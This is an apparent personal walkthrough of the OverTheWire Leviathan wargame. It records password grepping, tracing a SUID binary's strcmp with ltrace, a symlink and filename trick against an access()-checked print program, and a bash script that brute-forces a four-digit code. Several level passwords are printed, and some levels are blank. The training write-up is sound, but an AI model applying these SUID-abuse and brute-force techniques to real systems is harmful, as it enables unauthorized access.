# Leviathan - Over The Wire
> [name=El Famoso]
> [time=Thu, Feb 8, 2024 3:55 AM]
### Leviathan 0
I analyzed the file located in the `.backup` directory and used the `grep` command to search for 'leviathan' in the `bookmark.html` file.
```bash!
grep 'leviathan1' .backup/bookmark.html
```
We got the password for leviathan1 user.
`PPIfmI1qsA`
### Leviathan 1
There is a binary on the hime called `.check`. He got bit SUID for leviathan2 account.
We check the strings in the binary.
So there is some interessant function as we may expect in a password check file : getchar, strcmp ... then geteuid, setreuid. I check the password love to start but it was not the right one.
I use then ltrace it's a linux debugging tool that intercept and record dynamic library call made by a program. Here is the result :
We can that ltrace had traced a dynamic library call to `strcmp` with my input and the word `sex` so we may assume that this is the password.
were in, then cat `/etc/leviathan_pass/leviathan2`
`mEh5PNl10e`
### Leviathan 2
Now this is a printfile executable.
Nothing really interesting in the strings.
So if we create a file my program display it.
Maybe we can try to display the levianthan3 password. But it was not possible.
`You cant have access to that file`.
When we make a few test we see that there is a function access in c called, i don't know what this function does so i search a bit.
We see that this access fonction will test if the actual user can access to a specific file.
We encountered a blocking function call to access which takes plaintext as an argument. This function prevents us from accessing the password for leviathan3 if we don't have the necessary file permissions. However, due to the flexibility of cat which can take multiple arguments and the absence of input sanitization, the function snprintf poses a significant vulnerability.
The concept revolves around creating a file for which we have the permissions, let's say "lol.txt" and "oui.txt", which essentially represent a single file. When access checks the legitimacy of this file, it will verify it accordingly. However, by utilizing cat, we can concatenate the contents of "lol.txt" and "oui.txt". If we can redirect either of these files to "/etc/leviathan_pass/leviathan3", it could serve our purpose effectively.
Are you familiar with the ln function?
This vulnerability allows us to exploit the concatenation behavior of cat and the lack of input sanitization in snprintf, potentially leading to unauthorized access to the password file for leviathan3.
### Leviathan 3
This level was quite easy and this screen explain everything.
### Leviathan 4
### Leviathan 5
### Leviathan 6
```bash=
#!/bin/bash
# Check if the correct number of arguments is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <path_to_program>"
exit 1
fi
# Path to the program to brute force
program="$1"
# Define the range of possible four-digit codes
min=0000
max=9999
# Loop through all possible codes
for ((i=min; i<=max; i++)); do
# Pad the code with leading zeros to ensure it's four digits
padded_code=$(printf "%04d" $i)
# Run the program with the current code as the first argument
output=$(echo "$padded_code" | "$program" "$padded_code")
# Check if the output indicates success
if [ "$output" == "SUCCESS" ]; then
echo "Found correct code: $padded_code"
exit 0
else
echo "Attempted code: $padded_code"
fi
done
echo "Failed to find the correct code."
exit 1
```
`8GpZ5f8Hze`
Sign in with Wallet
Connect another wallet